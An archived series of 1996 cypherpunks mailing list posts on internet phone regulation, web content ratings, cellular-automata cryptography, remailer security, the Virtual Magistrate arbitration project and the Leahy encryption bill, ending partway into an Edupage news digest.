In-Reply-To: <Pine.SUN.3.91.960309104642.19290A-100000@infinity.c2.org>
Message-ID: <Pine.LNX.3.91.960309173236.108A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 9 Mar 1996, Just Rich wrote:

> There's also an article in today's San Jose Mercury News.
> 
> I'm just wondering how the hell they would enforce regulations on carrying
> voice over the Internet. Are they going to analyze every packet? What
> happens when someone makes a trivial modification to the code, or adds a
> gateway, so that the voice call uses a different UDP (or more likely RTP)
> port and header format? 

I wonder what exactly the FCC means by the term "Internet Phone."  Does this
just mean that software like IPhone will be regulated, or will this also apply
to RealAudio and sending uuencoded .WAV files through e-mail.  Also, will
this regulation apply to video and audio software like CuSeeMe and Mbone
software?

- --Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5
"The concept of normalcy is just a conspiracy of the majority" -me


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMUIIBLZc+sv5siulAQGTbQQAhlNhKIDKfAnRS4gPXCtTmpcGwBZyHM+4
xQ6/Zvcep8V9xcGayNcA1RT7HFD1qpqIq7Xojgbg76Bv5mK9g4GEVvZN18tFeaDF
gcYYG4qO0Wz681D4KsAaeC9OZ8n59StjLGAn/CVmCgI31LCWr/oUYcN31E4+r3gM
QU7Ag55idnE=
=WFIz
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 10 Mar 1996 07:12:37 +0800
To: cypherpunks@toad.com
Subject: Someone in a goverment with something close to the right idea...
Message-ID: <01I2565G8OEEAKTUFI@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Well, he at least has part of the right idea.
	-Allen

+++++++++++++++++++

   Reuters New Media
   
[...]   

   _ Friday March 8 2:41 PM EST _
   
Malaysia Is Against Curbs On Internet Debate

   KUALA LUMPUR, Malaysia - Censoring Internet access will not solve
   concerns over privacy and individual freedom in cyberspace, Malaysia's
   Deputy Prime Minister Anwar Ibrahim said.
   
   &quot;Censoring the Internet is not the solution. Simply closing our
   doors will not only hurt us but push us back in the race for growth
   and prosperity,&quot; he said in a speech at the launching of the
   Internet World '96 conference
   (http:/www.asiaconnect.com.my/asia-internet/)
   
   Countries concerned with such issues should instead utilize the
   Internet to reinforce social responsibility, he added. &quot;Let us
   not forget that an informed citizenry is also a responsible
   citizenry,&quot; Anwar said.
   
   
   
   Copyright, Reuters Ltd. All rights reserved




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Sun, 10 Mar 1996 11:31:34 +0800
To: cypherpunks@toad.com
Subject: Re: SurfWatch
Message-ID: <v01540b00ad67e1a770f3@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain


>>   I predict that 6 months after the first internet rating system is widely
>> deployed, the largest use of search engines such as altavista will be to
>> look for pages with the most "naughty" ratings.  Perhaps such services will
>> allow text searches for free, but charge for searches based on the rating
>> tag...
>> --
>> Jeff Weinstein - Electronic Munitions Specialist
>> Netscape Communication Corporation
>> jsw@netscape.com - http://home.netscape.com/people/jsw
>> Any opinions expressed above are mine.

In the mid-eighties in the UK they adopted the idea of a red triangle
continuously displayed on the screen of movies shown on TV that were
considered to have more than the normal share of wobbly pink bits, airborne
blood, etc.

Viewing figures for obscure 70's French movies shown at 1:30am soared as
all the horny geeks sat through two hours of forest/eating/traffic or
whatever scenes waiting for the 7 seconds of nudity.

I'm sure that far more children saw these movies than would have without
the government sponsored red flag with the words "Get It Here" being waved
like crazy as the movie rolled.


-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
                                   |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw@best.com                   |       -- Time Magazine, 3 July 1995






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 10 Mar 1996 09:25:56 +0800
To: cypherpunks@toad.com
Subject: Re: Fractals, Cellular Automata, and Encryption
Message-ID: <ad6763a10a021004611d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:35 PM 3/9/96, Alan Bostick wrote:

>Howard Gutowitz published and patented in 1992 a symmetric block cipher
>algorithm, based on cellular automata, called CA-1.1 .  There are a
>couple of CA-based hash algorithms.  CA-based PRNGs have been shown to
>be isomorphic to linear feedback shift register RNGs (not linear
>congruential generators, despite what Tim says) and so are subject to
>the same security woes as LFSRs.

Yeah, that sounds like what it is. This is what I get for answering a
question without checking reference sources and/or FAQs, including my own
FAQ, wherein it is written:

  18.6.2. "Can cellular automata, like Conway's "Game of Life," be used
            for cryptography?"
           - Stephen Wolfram proposed use of cellular automata for
              crytography some years back; his collection of essays on
              cellular automata contains at least one such mention. Many
              people suspected that 1D CAs were no stronger than linear
              feedback shift registers (LFSRs), and I recally hearing a
              couple of years ago that someone proved 1D CAs (and maybe
              all CAs?) are equivalent to LFSRs, which have been used in
              crypto for many years.
           - Wolfram's book is "Theory and Applications of Cellular
              Automata," 1986, World Scientific. Several papers on using
              CAs for random sequence generation. P. Bardell showed
              in1990 that CAs produce the outputs of LFSRs.) Wolfram also
              has a paper, "Cryptography with cellular automata," in
              Proc. CRYPTO 85.
           - Intuitively, the idea of a CA looks attractive for "one-way
              functions," for the reasons mentioned. But what's the
              "trapdoor" that gives the key holder a shortcut to reverse
              the process? (Public key crypto needs a trapdoor 1-way
              funtion that is easy to reverse if one has the right
              information).

On the other hand, if more people asking questions about fractals, chaos,
quantum cryptography, etc., would check the usual places, others would not
have to do this searching for them. (To his credit, the guy who asked today
if anyone knew anything about the "index of coincidence" did say that he
first grepped through my FAQ.)

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 10 Mar 1996 07:31:06 +0800
To: jrochkin@cs.oberlin.edu
Subject: Re: Remailer Security
Message-ID: <01I25746VK34AKTUGH@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)

>Um, there's no reason why your remailer's account needs to be logged into
>interactively, is there?  Seems like remailer ops should disable login to
>remailer accounts, putting '*' into the password field in /etc/passwd, or
>however unix lets you disable login (I know it does).

	This depends on the setup at the remailer machine. If I'm operating
a remailer off of a rented account on a commercial machine, how am I going to
maintain the remailer when it crashes if I can't get into that account? This
would work to some degree if the machine in question had the remailer program
in a publically-accessible account, and all the remailer account was doing was
A. acting as a forwarding account and B. containing info like the private key
of the remailer. But it could still go wrong in a way such that you'd need to
get into the account (or have root access, which is equivalent from what I
know of the subject).
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 10 Mar 1996 07:38:15 +0800
To: cypherpunks@toad.com
Subject: Virtual Magistrate Project
Message-ID: <01I257AWTBEEAKTUGH@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Unfortunately, the below system seems a bit civil liberties-unfriendly
in some ways (deeming laws against "obscenity" ever to be justified, for
instance). On the other hand, it's an arbitration mechanism - which should
have competitors and different contracts using different arbitratiors. Of
course, Phil Agre tends to want the "whole community" involved with stuff
instead of, as is proper in most cases, the people involved. Progressive
liberals... sigh.
	-Allen

From:	IN%"rre@weber.ucsd.edu"  5-MAR-1996 03:35:20.71

[Is this scheme too naive to work?  Well, if we want cyberspace to be
self-governing then surely we need something like this.  What's important,
I think, is legitimacy.  That is, people should regard it as having the
moral stature to actually make judgements and have them stick.  Certainly
*I* think that Bob Gellman is a good person to have in charge of a project
like this.  But it's the whole community's opinions that matter, not just
mine.  Should we have elections on the net for jobs like this?  Or what?]

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News Service (RRE).
Send any replies to the original author, listed in the From: field below.
You are welcome to send the message along to others but please do not use
the "redirect" command.  For information on RRE, including instructions
for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: Mon, 4 Mar 1996 10:18:04 -0500 (EST)
From: Paul Evan Peters <paul@cni.org>
To: Multiple recipients of list <cni-announce@cni.org>
Subject: Announcement of the Virtual Magistrate Project

Dear cni-announce subscribers:

Attached please find a press release announcing the establishment
of the Virtual Magistrate Project.  CNI is facilitating discussion
of this project, and I encourage your attention to it.  Let me know
if you have any observations or suggestions that you would like me
to pass on the project's organizers.

Best,

Paul

Paul Evan Peters
Executive Director
Coalition for Networked Information
21 Dupont Circle
Washington, DC 20036

Voice:  202-296-5098
Fax:  202-872-0884
Internet:  paul@cni.org

URL:  ftp://ftp.cni.org/
URL:  gopher://gopher.cni.org:70/
URL:  http://www.cni.org/CNI.homepage.html

PRESS RELEASE    PRESS RELEASE    PRESS RELEASE    PRESS RELEASE

              For Immediate Release, March 4, 1996 

         Virtual Magistrate Established for the Internet

       Voluntary Dispute Resolution for Network Conflicts

     A newly established Virtual Magistrate Project will assist
in the rapid, initial resolution of computer network disputes. 
The specialized system of online arbitration and fact-finding was
announced by Timothy C. Leixner, Chairman of the Board of the
National Center for Automated Information Research (NCAIR) which
is funding the pilot project.  The Fellows of the Cyberspace Law
Institute helped in the development of the project.

     "Millions of people around the world communicate and conduct
business on computer networks," said Mr. Leixner in announcing
the project.  "Disputes are inevitable, and existing courts can
be too slow, too cumbersome, and too local to have global effect. 
We need to explore new forms of dispute resolution, provide
timely relief, and develop appropriate sanctions that are
suitable for worldwide computer networks.  That is the purpose of
the Virtual Magistrate Project."

     A pool of neutral arbitrators with experience in the law and
in the use of computer networks will serve as the Virtual
Magistrates.  The magistrates (who do not have to be lawyers)
will be selected jointly by the American Arbitration Association
and the Cyberspace Law Institute, and will undergo training in
arbitration techniques.  

     Complaints will be accepted through either through
electronic mail or through a form on the Virtual Magistrate's
World Wide Web site.  Internet users, system operators, and
others affected by network messages, postings, and files may be
the source of complaints.  Initially, the Virtual Magistrate will
decide whether it would be reasonable for a system operator to
delete or otherwise restrict access to a challenged message,
posting, or file.  

     Objections may be based on copyright or trademark
infringement, misappropriation of trade secrets, defamation,
fraud, deceptive trade practices, inappropriate (obscene, lewd,
or otherwise violative of local system rules) materials, invasion
of privacy, and other wrongful content.  At a later date, the
Virtual Magistrate may accept complaints about other network-
related activities.

     The need for a fast and accessible resolution of disputes is
highlighted by ongoing litigation involving Netcom On-Line
Communications Services and the Church of Scientology.  The
Church alleged that postings made by a Netcom user infringed on
the Church's copyrights.  The case is before federal district
court, and a lengthy proceeding is expected.  Arbitration though
the Virtual Magistrate Project might have been able to offer an
independent assessment of whether there was infringement.  Prompt
identification of reasonable responses for system operators would
clearly be beneficial to all.  Use of the Virtual Magistrate for
immediate resolution of disputes would not preclude traditional
litigation.

     An impartial magistrate will be assigned to each complaint. 
Proceedings will normally take place through electronic mail. 
The goal is to reach a decision within 72 hours (three business
days) whenever possible.  Information on cases decided by the
Virtual Magistrate will be publicly available at a World Wide Web
site maintained by the Villanova Center for Information Law and
Policy at <http://vmag.law.vill.edu:8080/>.  Other documentation
for the Project is available at the same Web site.

     David Johnson, Co-Director of the Cyberspace Law Institute
said:  "The Virtual Magistrate Project is not a solution to all
network problems.  Some matters will inevitably end up in
traditional courts.  If the Virtual Magistrate Project can
contribute to the swift, inexpensive, and fair resolution of some
disputes, then it will be a success."

       Paul Evan Peters, Executive Director of the Coalition for
Networked Information, a diverse partnership of over two hundred
institutions and organizations promoting the scholarly and
intellectually productive uses of the Internet commented:  "This
project promises an extremely important and much needed
alternative to legislation, contract negotiation, and litigation
for addressing the uncertainties that we should all face together
in the rapidly evolving networked resource and service
environment."

     The Virtual Magistrate Project is a pilot project. 
Adjustments to the rules and procedures will be made based on
experience.  The Project will be evaluated by the participants at
a conference to be convened by NCAIR and CLI in May 1996, and
decisions will be made about finding a more permanent structure
and funding.  NCAIR has made $75,000 available for the operation
of the pilot.

     NCAIR is a non-profit, educational corporation actively
engaged in the study and application of technology to the to the
legal and accounting professions since 1966.  

     The American Arbitration Association (AAA) is a
public-service, not-for-profit organization offering a broad
range of dispute resolution services to corporations, attorneys,
insurers, individuals, trade associations, unions, consumers, and
all levels of government.  AAA has been an international focal
point for private dispute resolution since arbitration became an
acceptable alternative to courts in the 1920s.
     George Friedman, Senior Vice President of AAA said:  "Given
the increasing inaccessibility of the court system and the
explosive growth of online technology, it is quite appropriate
that an effort would be made to develop a means of resolving
disputes simply and quickly online.  The American Arbitration
Association is delighted to be a founding partner of the Virtual
Magistrate Project, which will undoubtedly pave new ground in
advancing alternative dispute resolution."

     The Villanova Center for Information Law and Policy will
maintain a public online repository of Virtual Magistrate
complaints, decisions, and documents.  The Villanova Center will
also maintain electronic discussion groups for magistrates,
participants, and other interested parties, and it will work
jointly with AAA to prepare training materials.  The Villanova
Center is at Villanova University School of Law, near
Philadelphia.


Contacts:
          Virtual Magistrate Project, Robert Gellman, Executive
     Director, 202-543-7923, rgellman@cais.com

          Cyberspace Law Institute, David R. Johnson, 202-496-
     9523, djohns06@counsel.com; David Post, 202-364-5010,
     dpostn00@counsel.com

          Villanova Center for Information Law and Policy, Henry
     H. Perritt, Jr., Professor of Law, 610-519-7078,
     perritt@law.vill.edu

          National Center for Automated Information Research: 
     Timothy C. Leixner, Chairman of the Board, 954-462-3300
     emoleixner@aol.com

          American Arbitration Association:  George Friedman,
     Senior Vice President, 212-484-4120, usadrghf@arb.com

     
Electronic Addresses for the Virtual Magistrate Project

     VM Web Page:             http://vmag.law.vill.edu:8080/
     AAA Web Page             http://www.adr.com
     Complaints:              vmag@mail.law.vill.edu
     Help:                    vmag-question@mail.law.vill.edu
                              vmag-help@mail.law.vill.edu
     VM Operations:           vmag-admin@mail.law.vill.edu
                              vmag-owner@mail.law.vill.edu
     AAA Administrator:       vmag-aaa@mail.law.vill.edu
     VM Executive Director:   rgellman@cais.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dan Weinstein" <djw@vplus.com>
Date: Sun, 10 Mar 1996 17:32:57 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Leahy bill nightmare scenario?
Message-ID: <199603100201.SAA16619@ns1.vplus.com>
MIME-Version: 1.0
Content-Type: text/plain


On  9 Mar 96 at 9:26, you wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> At 12:19 PM 3/8/96 -0800, Dan Weinstein wrote:
> 
> 
> >> Second, if what they're charging is the hindrance of an
> >> felony investigation, it isn't clear to me why they would be
> >> limiting the charging of that "crime" to only those actually who
> >> have committed a felony. (logic isn't the normal mode of thought
> >> for a government employee, you realize.)  
> >
> >I agree with your concerns here, but I find it hard to believe that
> > the courts would allow a broader interpretation.
> 
> Unfortunately, what you find "hard to believe" I find easy to
> believe.  Remember, if this bill is passes, it doesn't merely affect
> YOU, it affects ME.  So I suggest the burden of proof is on YOU to
> show that these provisions aren't going to be maliciously
> interpreted by the courts.

Burden of proof?  Sorry, I do not have to justify my views to anyone. 
 I am trying to have a reasonable discussion of this issue, thus, the 
"burden of proof" lies equal on each of us. 
 
> >>  Third, all they have to do is to "suspect" the person of a
> >>  felony, and a 
> >> "felony investigation" starts.  That would presumably make him
> >> guilty of the Leahy bill's provision, regardless of whether he is
> >> actually participating in the crime supposedly being
> >> investigated.
> >
> >Here you are dead wrong, the bill specifically states: "in
> >furtherance of a felony."  Its like those laws that let them charge
> >someone with murder in the first if someone dies while you are
> >commiting another felony.  They must prove the original felony
> >before they can get you on the murder one.  The real purpose of
> >this provision, as I read it, is to give longer sentences to
> >criminals that use crypto.
> 
> I'm not a lawyer, but I assume neither are you.  Please explain the
> LEGAL DEFINTION of "in furtherance of a felony."  If you can't, then
> you simply don't know how far they will go.  And you're depending on
> the reasonableness of the government for the interpretion.

True, I am not a lawyer.  I would like to hear from one of the 
lawyers on the list for a more deffinitively.  Since you also admit 
you are not a lawyer, I do not accept your opinion as superior to 
mine.  I was pointing it out as something that I believed you had 
missed.  I find it hard to believe that anyone can further a felony 
when their is no felony.  In addition, this is VTW's interpretation 
based on the analysis that they have posted to their home page.  I 
would presume that they were using lawyers to analyze the bill.
 
> >> Fourth, I gave what I considered to be a clear example of the
> >> hypothetical misuse of an encrypted remailer by the cops, one
> >> that would arguably make the remailer operator guilty of some
> >> "reasonable" anti-kiddie-porn statute.  At that point, _he_is_
> >> the target of the investigation.  Unless you can show that this
> >> kind of action by the government is impossible, I consider it to
> >> be not merely possible but almost certain to occur.
> >
> >Again, the problem I see with your scenario is that I don't believe
> > that the courts will interpret it that way. 
> 
> What you think is irrelevant.  Most people probably didn't realize
> what the government did in the Amateur Action BBS case was "legal,"
> either.  But they did it anyway.

Yes, this case was certainly a travesty.  The thing about it was that 
it violated the law.  Their actions took place in California, but 
they were tried in Tennessee.  This is a violation of U.S. law.  
Again, this is my non-professional opinion, but I have heard several 
professionals proclaim that the governments actions seriously 
violated its own laws.   If your point is that the government does 
not obey its own laws, then all I can say is that if that is how you 
feel then why oppose the bill?  Won't they end up doing what they 
want anyway?

> 
> > My interpretation is that 
> >if they serve a warrent and I don't decrypt for them and they can
> >prove a felony, then I will be subject to the listed punishment.
> 
> Are you assuming that you have the key?  Remember, if you run an
> encrypted anonymous remailer, and assuming you do it honestly, you
> won't be keeping records as to the source of the note.
>
> Thus, if they "serve a warrant" and you CAN'T decrypt the message
> (or tell them where it came from) then why aren't you already
> guilty?  Remember, the wording of the proposed law doesn't require
> that you have full knowledge of the crime involved, merely that you
> act "in furtherance" of it...   If you don't possess the key, but
> you explicitly ran your remailer so that you never it, just so you
> couldn't relinquish it, you have structured your operation too
> thwart any investigations.  You are ALREADY guilty.  This may not
> sound reasonable, but the government no longer (if it ever did)
> considers "reasonableness" to be an impediment to their actions.
>

I don't but this.  If I am a reporter if I receive an anonymous tip, 
a court could order me to tell who my source was, but I couldn't and 
they couldn't do anything about it unless they could prove that I 
knew who the source was.  If I knowingly aranged for the source not 
to reveal himself to me, could I them be charged with obstruction of 
justice or contempt of court?  Again it is my non-profesional 
opinion, but I really doubt this. Comment from a lawyer would be 
appreciated.
 
> 
> >> Fifth, it isn't clear what amount of knowledge is necessary to
> >> "trigger" this clause, especially in its current flawed state.
> >> Since ISP's and encrypted remailers might know, in general, that
> >> their systems can and probably are being used for SOME criminal
> >> activity, even if they can't identify it or the user, or decrypt
> >> it, etc, a broad interpretation of the resulting law could easily
> >> de-facto prohibit any business practices (i.e., allowing users to
> >> use encryption) that prevents full-scale monitoring and/or
> >> tracing.
> >
> >I disagree, it states you must "willfully endeavor" to use the
> >encryption as a means of obstructing the investigation.  To me,
> >this means that it is the motivation for using the encryption. 
> 
> Question:  What, exactly, is the motivation of a person running an
> anonymous remailer?  His motivation is clear:  To allow people to
> send anonymously untraceable messages.  Assuming he's of ordinary
> levels of intelligence or beyond, he is aware that somebody may some
> day use his system for illegal purposes.  You're going to have to
> explain why a court _CAN'T_ interpret this as being in violation of
> the law.
> 

If I rent cars, someone might one day use a car rented from me in a 
robbery.  Does that make my an accessary?  NO.

> 
> > If I set 
> >up an encrypting remailer for the purpose of allowing free exchange
> > of ideas, I don't believe I would be liable under this law.
> 
> Your optimism is touching.  It is also vastly misguided.

If you think I am optimistic, you must think just about everyone is 
an easy dupe.  If I do not quite reach your level of paranoia, I 
apologize; I will try to get to where I distrust everyone like you. 
Or are you just plotting to make me paranoid?
 
> >The 
> >only way I could see a remailer charged under this is if he had
> >solid evidence that a specific user was violating the law, and took
> >no action.
> 
> Gee, I wish you were right, but my experience with government thugs
> says that they will do anything they think they can get away with.
> 

Their is certainly A LOT of that with in our government, but to claim 
everyone in the government is a jack-booted thug is just too far over 
the top for me. (Yes, yes I realize you think this is niave.)

> 
> >> This is only the beginning of the problems with this section.  If
> >> you can explain why nothing I've described could possibly occur,
> >> I welcome a contrary explanation.  
> >
> >I see some real problems too, but I do not see the problems with
> >this provision to be enough to condemn the entire bill.
> 
> I don't "condemn the entire bill."  I would, however, reject the
> entire bill if that provision remains.  And morever, if we make a
> serious attempt to have it removed, the more they resist removing it
> the more we should insist it go.

I don't want it removed, I think it is an important bone to through 
to those in the middle.  I would like the phrasing tightened up so 
that it could only be used against those that deserve it.
 
> >I would like to 
> >see this portion of the bill ammended to make it clear that only
> >those actually involved in commiting the felony would be held
> >responsible. 
> 
> There would still be a problem.  What's the definition of "actually
> involved in committing the felony"?  Are you aware, for example,
> that manufacturers of small plastic screw-top vials have been
> prosecuted and convicted simply because their vials could be used to
> hold small quantities of drugs such as cocaine and crack?  This was
> a case from a few years back, BTW.  I wish I could remember the
> cite.

I was not proposing that exact language, I am not a lawyer and don't 
imagine I could come up with the bullet-proof wording that is 
required.
 
> If you're not aware of these things, WAKE UP!  Your optimism
> disgusts me, because it is entirely unrealistic and based on a
> rose-colored-glasses view of the government.

I am not aware of the vial case; I certainly would find such a thing 
interesting to read.  If this was what happened, and laws exist that 
allow this, then we ought to repeal those laws, but I don't see the 
baring that has on this case; I have already said that they should 
narrow the language so that it will not be used to the ridiculous 
extream.
 
> >> But I would also ask this:  Why, exactly, do we need this
> >> section? We've already been told that the opponents of this bill
> >> will fight it tooth-and-nail under its current wording; if that's
> >> the case then the presence of this section is inadequate to
> >> appease their unhappiness.  Therefore, we shouldn't include it in
> >> the bill at all; it does no good.
> >> 
> >> Any explanations, Dan?
> >
> >You are talking about the fringe, this, I think, was added as an
> >attempt to bring in those that are in the middle. 
> 
> Why would "those that are in the middle" object to a bill which is
> little more than a re-statement of rights we already believe we
> have?!?

I am not talking about reality; I am talking about what they can tell 
the voters if they are beat up over passing such a bill.  You seem to 
over rate the average voters grasp of the issues.  It doesn't matter 
that the bill really creates or diminishes crime, it is how the 
voters can be made to perceive it.
 
> > That is, Those 
> >that see the need to prevent the use of encryption as a means of
> >obstructing justice, but feel that we should also have a right to
> >privacy.
> 
> There is no viable middle ground here.  Any tool can be abused.
>

If that is true, than you are left with those that are the oppressed 
and the jack-booted thugs.  I do not believe that the only motivation 
of those that are opposed to strong encryption is to oppress me.  
Many are trying to do what they think is right, this provision is 
their to give those that are tetering between the two options an easy 
way to move to our side.
 
>
> >  To say that there is no delema here is ridiculous, crime is 
> >a serious problem that we are already having a terrible time
> >dealing with. 
> 
> On the contrary, my opinion is "The _government_ is a serious
> problem that we are already having a terrible time dealing with."  
> Fortunately, I've found a solution, and the government is trying as
> hard as it can to prevent it (and "crypto-anarchy" in general) from
> taking root.
>

Good premise, now if you could sell that premise to everyone in 
Congress than your right this provision is useless.  Unfortunately, I 
don't think you will have much luck with this.
 
> 
> > I think Leahy realizes that this provision will be about as 
> >useful as the "use a gun, go to jail" laws, but wants to give those
> > in the middle to say that they bill will help prevent crime.
> 
> Ha ha!  That's rich!  There is no reason that a "pro-encryption"
> bill has to contain any general "anti-crime" clauses.  The average
> person is afraid of burglars, muggers, murderers, rapists, car
> thieves.  When is the last time the average person was the victim of
> a crime whose investigation could be "thwarted" by the use of
> encryption?  If you can't think of an example, you've just proved my
> point:  This provision is entirely irrelevant to the average citizen
> (at least in a "positive" way) and can't be considered a "win" for
> him. 

You talk about my being naive, this takes the cake.  Do you really 
believe that any pro-crypto bill could make it through Congress with 
out some sort of anti-crime clause?  
 
> >> Jim Bell
> >> jimbell@pacifier.com
> >> 

Dan Weinstein
djw@vplus.com
http://www.vplus.com/~djw
PGP public key is available from my Home Page.
All opinions expressed above are mine.

"I understand by 'freedom of Spirit' something quite definite -
the unconditional will to say No, where it is dangerous to say
No.        
           Friedrich Nietzsche




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 10 Mar 1996 10:27:43 +0800
To: cypherpunks@toad.com
Subject: Re: SurfWatch
Message-ID: <ad67659f0b021004d8f2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I plan to taper off on all responses to this thread about SurfWatch and
ratings services. Various sides have expressed their opinions about what
courts and governments will demand, and others respond by saying, "I
disagree. They can pass a law..." or "I disagree. The government is
powerless," etc.

At 11:25 PM 3/9/96, E. ALLEN SMITH wrote:

>        Given various anti-obscenity laws that the idiot Supreme Court has
>already found constitutional (including those against providing "indecent"
>material to minors), I wouldn't depend on the First Amendment. Here are some

Finding something to be obscene, or treasonable, or actionable in other
ways, ex post facto, is significantly different from a requirement _in
advance_ that words be "rated." (Before anyone cites the MPAA movie
ratings, an old war horse often trotted out as proof that the government
requires ratings, let me again point out that the MPAA ratings are not
required by the government and that the MPAA is nominally a private
organization. Now, what the government _might_ have done back in the 60s
had the movie industry not acted to "police themselves" is unknown to us.
The Supremes might have overturned any mandatory rating on movies, just as
they almost certainly would for words.)

In the terms of the lawyers--from what I picked up during my time on the
Cyberial list--a requirement that words be rated before they can be
distributed would not pass Constitutional muster. This does not mean that
one's words will not trigger prosecutions, lawsuits, treason trials, etc.
What it means is that "prior restraint" is frowned upon (recall "The
Progressive" H-bomb case of about 15 years ago, where a court subjected
this magazine to prior restraint...a rare occurrence, later overturned. A
more recent case involves "Business Week," and is still unresolved).

>scenarios under which rating services could turn into bona-fide censorship
>(by the governmental limiting of information access definition):
>        A. The government threatens ISPs with more direct censorship (a la the
>CDA) unless they force their users to rate their pages with some such service.

See above. Books are not rated. Even the "parental advisories" on CDs are
ostensibly voluntary (granted, because noises were made about government
ratings...but the point remains that a good, solid Constitutional test has
not yet happened).

>        C. The government (a la the V chip) requires a rating system, or one
>of a collection of "government-approved" rating systems, for all web pages.

By the way, who does the rating in this scenario? As others have also
noted, if I am rating my own pages, and rate them as "suitable for all
ages," but Jesse Helms disagrees, what charges can be filed? That I was not
a good enough judge of the material? That my opinions differed from Senator
Helms'?

"Voluntary self-rating" runs into problems, such as this example. One is
left with ratings by _others_, e.g.. ratings boards, and even then there
are variations of this same problem. The "Lesbian Alliance" is going to
have different ideas of what children should be exposed to than the
"Christian Crusade" will ideas about. Who is right? ("What is truth?")

So, one is then left with government censors. And the Constitution is
pretty clear about this.

>        D. The government in a country such as China uses rating systems to
>help them filter.

Doesn't have much to do with _my_ words or pages. It ain't the business of
the U.S. court system--which is what we're talking about here--to worry
about what some Maoists think is proper for young cadres to read.


>(They do not get around the question of whether parents should be permitted to
>restrict children's information access on grounds such as obscenity at all.
>Given that no harm has ever been proven from children's viewing such material
>(_possibly_ unlike the data on violence, although that is quite disputable and
>not an argument for censorship), whether parents properly have that degree of
>sovereignty over their children is questionable. Children are not the property
>of their parents.

I disagree with the overall conclusions of this line of reasoning. (Though
the "children are not the property of their parents" point is heavy
phrasing, and hard to take issue with directly, due to the language.)

I don't know if exposure to sex is good or bad. I see a lot of aimless
souls. I see a lot of AIDS. I'm unpersuaded that the proper solution is
just to teach "safe sex" and proper condom-donning behaviors to fourth
graders. If my neighbor wants to expose her children to this, that's her
business.

In any case, while children are not for their parents to do with as they
please, a reasonable Schelling point has been that I will not force other
parents to expose their children to the teachings of Cthulhu if they will
not demand that my children sit through propaganda tapes about the joys of
homosexual sex. The status of children in a free society is a thorny issue,
but I reject the increasingly-prevalent notion that society knows what's
best and the government will decide what influences can be used with
children. A society which takes away this parental choice is a terrible
society.

I see much of the debate about violence and sex in society and in the media
as being this kind of "battle for the hearts and minds" of children. I
don't want some sociologist telling me that "Terminator II" is "bad" for my
child but that "The Story of O" should be mandatory for my 11-year-old to
watch.

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 10 Mar 1996 08:08:57 +0800
To: cypherpunks@toad.com
Subject: Edited Edupage, 5 March 1996
Message-ID: <01I258226POUAKTUGH@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"educom@elanor.oit.unc.edu"  7-MAR-1996 16:54:24.02

>*****************************************************************
>Edupage, 5 March 1996.  Edupage, a summary of news items on information
>technology, is provided three times each week as a service by Educom,
>a Washington, D.C.-based consortium of leading colleges and universities
>seeking to transform education through the use of information technology.
>*****************************************************************

	Unless all they're doing is putting an (incredibly expensive) front
end on PGP, these people appear to be reinventing the wheel.

>OPEN MARKET OFFERS SAFE MESSAGING
>Open Market Inc. has developed a new class of Web software designed with
>built-in message-checking to ensure the integrity of messages and make the
